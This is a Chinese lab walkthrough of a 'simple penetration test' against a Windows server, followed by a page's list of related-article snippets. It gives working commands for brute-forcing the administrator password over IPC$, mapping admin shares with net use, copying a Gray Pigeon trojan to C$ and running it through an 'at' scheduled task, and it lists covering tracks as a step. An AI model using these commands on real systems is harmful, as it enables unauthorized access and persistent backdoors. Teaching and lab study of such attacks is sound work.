目录

一、实验流程

二、实验过程

  2.1 信息收集

  2.2 利用过程

  2.3 暴力破解系统密码之445

  2.4 通过木马留后门


一、实验流程

0.授权(对方同意被渗透测试才是合法的。)
1.信息收集
  nslookup whois
2.扫描漏洞
  namp=ip范围 端口 80(IIS,apache,什么网站)scanport
  高级扫描:如IIS漏洞2003——IIS6.0       2008——IIS7.0
            扫描网站漏洞(owasp top10)
3.漏洞利用

4.提权(shell环境、桌面环境、最高权限)
========
5.毁尸灭迹
6.留后门
7.渗透测试报告

手工测试端口号开放:
telnet IP地址 测试端口

1.scanport扫描445端口

2.漏洞利用之IPC$:
进行暴力破解:NTscan

3.
net use  \\10.1.1.2\ipc$ 密码 /user:用户
=====================================
net use f: \\10.1.1.2\share 密码 /user:用户
net use f: /del
net use * /del
net use f: \\10.1.1.2\c$ 密码 /user:用户
==========================================

4.制作木马
利用光盘上的灰鸽子软件

5.植入木马(留后门)
copy d:\heihei.exe \\10.1.1.2\c$

6.设置计划任务自动执行木马:
net time \\10.1.1.2
at \\10.1.1.2 11:11 "c:\heihei.exe"

7.等待肉鸡上线

二、实验过程

​win7想打server

2.1 信息收集

比如收集445端口的。扫描软件很多,win平台以ScanPort为例。

还可以用telnet命令,不用扫描工具。

例如目前的目标机器10.1.1.1 的 445 端口开着,446 端口关闭。

用telnet分别手动探测这俩端口:

扫描技术就是为了确定攻击目标。有了445就可以就IPC$漏洞


2.2 利用过程

net use f: \\10.1.1.1\share 123.abc /user:administrator

这句话是将对方的share路径映射为本机的F盘。

在这个里面可以跟操作本地文件夹目录一摸一样。

怎么查看当前有哪几条连接记录呢?

如何删除这条记录呢》

想要攻击服务器的445端口,对于命令

net use f: \\10.1.1.1\ipc$ 123.abc /user:administrator

只缺123.abc,即可以通过暴力破解进入对方的ipc$.

(安全建议:服务器管理员别叫Administrator,不建议用户名跟公司名等有关系)

2.3 暴力破解系统密码之445

NTscan其实就是不同的利用上述命令。

可以用真空密码字典生成器制作字典

开始扫描

有了密码就可以为所欲为了、

net use \\10.1.1.1\ipc$ 123.abc /user:administrator

可以查看c盘下所有文件夹

2.4 通过木马留后门

通过灰鸽子,配置服务程序就是制作木马

运行一下藏在windows server的exe

替server做一个计算任务运行该程序:

查看server时间

可以看到目标机器已经上线。 可以干很多事。。。

简单渗透测试流程演示(445端口、IPC$、灰鸽子)的更多相关文章

  1. Web渗透测试流程

    什么是渗透测试? 渗透测试 (penetration test)并没有一个标准的定义,国外一些安全组织达成共识的通用说法是:渗透测试是通过模拟恶意黑客的攻击方法,来评估计算机网络系统安全的一种评估方法 ...

  2. 『安全科普』WEB安全之渗透测试流程

    熟悉渗透流程,攻击会像摆积木一样简单! 0x 01:信息收集 收集网站信息对渗透测试非常重要,收集到的信息往往会让你在渗透中获得意外惊喜. 1. 网站结构 可以使用扫描工具扫描目录,主要扫出网站管理员 ...

  3. 【转】WEB安全之渗透测试流程

    熟悉渗透流程,攻击会像摆积木一样简单! 0x 01:信息收集 收集网站信息对渗透测试非常重要,收集到的信息往往会让你在渗透中获得意外惊喜. 1. 网站结构 可以使用扫描工具扫描目录,主要扫出网站管理员 ...

  4. 渗透测试流程——渗透测试的9个步骤(转)

    目录 明确目标 分析风险,获得授权 信息收集 漏洞探测(手动&自动) 漏洞验证 信息分析 利用漏洞,获取数据 信息整理 形成报告 1.明确目标 1)确定范围:测试的范围,如:IP.域名.内外网 ...

  5. 简单web测试流程(转载)

    转载自 http://blog.csdn.net/qq_35885203 1.界面操作模式打开jmeter 进入jmeter安装目录的bin目录下,双击“jmeter.bat”文件即可打开jmeter ...

  6. 实验吧 这个看起来有点简单!&渗透测试工具sqlmap基础教程

    题目地址:http://ctf5.shiyanbar.com/8/index.php?id=1 下载sqlmap,拖到python安装文件夹下面,在桌面创建sqlmap的cmd快捷方式,都不赘述. 教 ...

  7. Kali Linux渗透测试实战 1.3 渗透测试的一般化流程

    1.3 渗透测试的一般化流程 凡事预则立,不预则废,做任何事情都要有一个预先的计划.渗透测试作为测试学科的一个分支,早已形成了完整的方法论.在正式开始本书的实践教学章节之前,我也想谈一谈使用Kali ...

  8. 《Metasploit渗透测试魔鬼训练营》第一章读书笔记

    第1章 魔鬼训练营--初识Metasploit 20135301 1.1 什么是渗透测试 1.1.1 渗透测试的起源与定义 如果大家对军事感兴趣,会知道各国军队每年都会组织一些军事演习来锻炼军队的攻防 ...

  9. PTEST 渗透测试标准

    1:前期交互阶段 在前期交互(Pre-Engagement Interaction)阶段,渗透测试团队与客户组织进行交互讨论,最重要的是确定渗透测试的范围.目标.限制条件以及服务合同细节.该阶段通常涉 ...

随机推荐

  1. Java数据结构——二叉树节点的增删改查、获取深度及最大最小值

    一.查找最大值 // 查找最大值 public static Node maxNode() { Node node = root; Node maxNode = node; while (node ! ...

  2. Java多线程_生产者消费者模式1

    生产者消费者模型       具体来讲,就是在一个系统中,存在生产者和消费者两种角色,他们通过内存缓冲区进行通信,生产者生产消费者需要的资料,消费者把资料做成产品.生产消费者模式如下图.(图片来自网络 ...

  3. 断言函数-RF

    测试用例的目的是要验证一些操作否符合我们的预期结果,所以在测试用例中,断言函数是必不可少的一项.我们做的每一步操作都会有预期的结果,为了保证操作得到的结果符合预期,我们需要在测试用例中添加断言,来保证 ...

  4. 快速构建一个完整的Selenium框架

    今天跟大家细讲如何构建一个完整的selenium框架,当你学会了这一篇你就也可以说自己会selenium自动化测试了. 1.新建项目,结构如图: 注意:整个项目除了最外层的是文件夹,其他的都是包(pa ...

  5. 高可用集群之corosync+pacemaker

    1.概念 在传统Linux集群种类,主要分了三类,一类是LB集群,这类集群主要作用是对用户的流量做负载均衡,让其后端每个server都能均衡的处理一部分请求:这类集群有一个特点就是前端调度器通常是单点 ...

  6. vue路由守卫+cookie实现页面跳转时验证用户是否登录----(二)设置路由守卫

    上一篇我们已经封装好了cookie方法,登录成功之后也可以吧用户信息存到cookie中,接下来需要在router/index.js中引入一下cookie.js文件 然后继续添加以下代码 /* * be ...

  7. React状态管理相关

    关于React状态管理的一些想法 我最开始使用React的时候,那个时候版本还比较低(16版本以前),所以状态管理都是靠React自身API去进行管理,但当时最大的问题就是跨组件通信以及状态同步和状态 ...

  8. Python基本

    Python基本规则 1.面向对象的跨平台的编程语言 2.文件类型是.py, 3.一个文件是一个模块module,运行整个文件 4.不支持非英文字符,区分大小写 5.一行是一条语句,多条语句写一行用; ...

  9. 详细分析链表中的递归性质(Java 实现)

    目录 链表中的递归性质 前言 LeetCode 上关于链表的一道问题 203 号题目 移除链表中的元素 递归的基本概念与示例 链表天然的递归性 小结 链表中的递归性质 前言 在前面的 链表的数据结构的 ...

  10. 07_Python语法示例(基础语法,文件操作,异常处理)

    1.写程序在终端输出图形 ######## # # # # ######## print("#" * 8) print("#" + " " ...